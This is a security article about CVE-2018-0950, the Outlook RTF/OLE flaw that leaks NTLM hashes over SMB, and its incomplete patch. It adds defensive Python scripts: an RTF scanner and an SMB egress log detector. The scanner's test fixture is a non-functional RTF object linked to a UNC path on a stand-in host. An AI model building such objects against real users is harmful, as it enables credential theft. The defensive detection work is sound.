Stealing Windows password hashes and incomplete patching in Microsoft Outlook
Apparently, Microsoft believes that it has done everything it needed to secure the most popular e-mail client in the world, Microsoft Outlook. The flaw, reported 18 months ago by Will Dormann of the American CERT Coordination Center (CERT/CC), has only been partially patched. As the expert explains, in the latest Patch Tuesday update (released on the second Tuesday of each month) Microsoft has not completely eliminated the problem behind the vulnerability with the ID CVE-2018-0950.
Initially, this was a very serious flaw in Microsoft Outlook. Exploiting the vulnerability leaked Windows login credentials when the victim received an RTF e-mail message containing an OLE object. It was enough to read the message in the Microsoft Outlook e-mail client: an SMB connection to a server controlled by the attacker was then initiated automatically. No user interaction was required.
The following screenshot shows that a remote image is not loaded; user interaction is required. This is a standard security feature of MS Outlook that counteracts disclosure of the victim's real IP address and other metadata (it applies to regular plain-text and HTML messages).
Will Dormann repeated the experiment with a message in RTF format and an OLE object that is loaded from a remote SMB/CIFS server:
If the message is in RTF format, the Outlook mail client loads the OLE object without any interaction.
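A mail gateway or incident responder can triage RTF messages for the pattern described above before they reach Outlook. The following scanner is an added example (not code from the article or from CERT/CC); it looks for the RTF control words that introduce an OLE object (`\object`, `\objautlink`, `\objupdate`, `\objdata`, `\objemb`, all from the RTF specification) and for a UNC path to a remote host, and rates the message. The sample RTF is constructed for the test and is not a working object (the `\objdata` payload is a placeholder); real payloads can also hide the target path inside hex-encoded `\objdata`, which this text-level scan does not decode.

```python
import re

# RTF control words that introduce an embedded or linked OLE object.
OLE_OBJECT_WORDS = (r"\object", r"\objautlink", r"\objupdate", r"\objdata", r"\objemb")

# A UNC path written as plain RTF text: every backslash is itself escaped,
# so \\host\share appears as \\\\host\\share in the raw file.
UNC_RE = re.compile(r"\\\\\\\\([A-Za-z0-9.\-]+)\\\\([^\\ }]+)")


def scan_rtf(rtf: str) -> dict:
    """Return the OLE indicators found in an RTF body and a coarse risk rating."""
    found = [word for word in OLE_OBJECT_WORDS if word in rtf]
    # \objautlink / \objupdate mean the object is refreshed from its source
    # when the document is opened, i.e. without user interaction.
    auto_update = r"\objautlink" in rtf or r"\objupdate" in rtf
    unc_hosts = sorted({m.group(1) for m in UNC_RE.finditer(rtf)})
    if auto_update and unc_hosts:
        risk = "high"      # auto-refreshed object pointing at a remote host
    elif found:
        risk = "medium"    # OLE object present; inspect the object data
    else:
        risk = "low"
    return {
        "ole_control_words": found,
        "auto_update": auto_update,
        "unc_hosts": unc_hosts,
        "risk": risk,
    }


# Constructed sample: an RTF skeleton with an auto-updating linked object whose
# source is a UNC path on a documentation-range address. Not a functional object.
SAMPLE_RTF = (
    r"{\rtf1\ansi{\object\objautlink\objupdate\objw1000\objh1000"
    r"{\*\objclass Package}{\*\objdata 00010000}"
    r"{\result{\pict\wmetafile8 00}}"
    r" \\\\192.0.2.10\\share\\img.png}}"
)

BENIGN_RTF = r"{\rtf1\ansi Quarterly report attached.}"

if __name__ == "__main__":
    for name, body in (("sample", SAMPLE_RTF), ("benign", BENIGN_RTF)):
        print(name, scan_rtf(body))
```

In a gateway the "high" verdict would quarantine the message; "medium" is a cue to unpack the OLE object itself (for example with an RTF/OLE parser) rather than trusting the text scan.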
The traffic captured in Wireshark reveals what was actually obtained:
Reading the message led to the theft of the IP address, domain name, username and hostname, an automatic SMB session login and the NTLMv2 authentication hash, which was cracked on an NVIDIA 960 GPU in 1 second (although it must be admitted that the password "test_user" is very easy to break).
This is not the only problem associated with CVE-2018-0950. The user also gets a free BSOD and ends up in a loop: Outlook remembers the last open message, so every time the system is restarted and the user tries to open the e-mail client, the system hangs again.
The update for CVE-2018-0950 released by Microsoft no longer allows automatic loading of OLE content from a remote server, but the fix can still be bypassed with a social engineering attack, which now requires a click on a URL to start the connection to the foreign SMB server.
The accompanying guide recommends blocking outbound connections on 445/tcp, 137/tcp, 139/tcp, 137/udp and 139/udp, installing the released updates, disabling NTLM Single Sign-on (SSO) and using complex passwords.
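Whether the port blocking above is actually in place, and whether any client has already tried to talk SMB or NetBIOS to the Internet, can be checked from firewall or flow logs. The script below is an added example (not from the article or the CERT/CC guide): it parses constructed firewall log lines in a simple key=value format, flags connections to the five ports listed above whose destination lies outside an assumed set of internal ranges, and counts alerts per source host. The log format and the internal address list are assumptions to adapt to your environment.

```python
import ipaddress
import re
from collections import Counter

# Ports the guide recommends blocking at the perimeter.
SMB_PORTS = {("tcp", 445), ("tcp", 137), ("tcp", 139), ("udp", 137), ("udp", 139)}

# Assumed internal ranges: RFC 1918, loopback and link-local. Adjust per site.
INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
              "127.0.0.0/8", "169.254.0.0/16")
]

# Assumed log format: "<timestamp> src=<ip> dst=<ip> proto=<tcp|udp> dport=<n> action=<allow|block>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+"
    r"proto=(?P<proto>\w+)\s+dport=(?P<dport>\d+)\s+action=(?P<action>\w+)"
)


def parse_line(line: str):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"])
    rec["proto"] = rec["proto"].lower()
    return rec


def is_external(ip: str) -> bool:
    """True when the address is a valid IP outside every internal range."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def smb_egress_alerts(lines):
    """Return records of SMB/NetBIOS connections (allowed or blocked) to external hosts."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if (rec["proto"], rec["dport"]) in SMB_PORTS and is_external(rec["dst"]):
            # An allowed connection means the client may already have sent an
            # NTLM authentication; a blocked one still shows something tried to.
            rec["reason"] = "SMB/NetBIOS to external host: possible NTLM credential leak"
            alerts.append(rec)
    return alerts


def hosts_by_alert_count(alerts):
    """Source hosts ordered by how many external SMB attempts they made."""
    return Counter(a["src"] for a in alerts).most_common()


# Constructed sample log; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
2018-04-11T10:02:13Z src=10.1.2.34 dst=203.0.113.7 proto=tcp dport=445 action=allow
2018-04-11T10:02:13Z src=10.1.2.34 dst=10.1.0.5 proto=tcp dport=445 action=allow
2018-04-11T10:02:14Z src=10.1.2.34 dst=203.0.113.7 proto=udp dport=137 action=allow
2018-04-11T10:02:15Z src=10.1.2.34 dst=198.51.100.20 proto=tcp dport=443 action=allow
2018-04-11T10:03:01Z src=10.1.2.99 dst=203.0.113.7 proto=tcp dport=139 action=block
garbage line that does not parse
"""

if __name__ == "__main__":
    found = smb_egress_alerts(SAMPLE_LOG.splitlines())
    for a in found:
        print(a["ts"], a["src"], "->", a["dst"], a["proto"], a["dport"], a["action"])
    print(hosts_by_alert_count(found))
```

Connections to the internal file server on 445/tcp are deliberately left alone, since blocking SMB inside the network is not what the guide asks for; the "allow" entries to an external address are the ones that indicate the perimeter rule is missing and that the source host's password hash may need rotating.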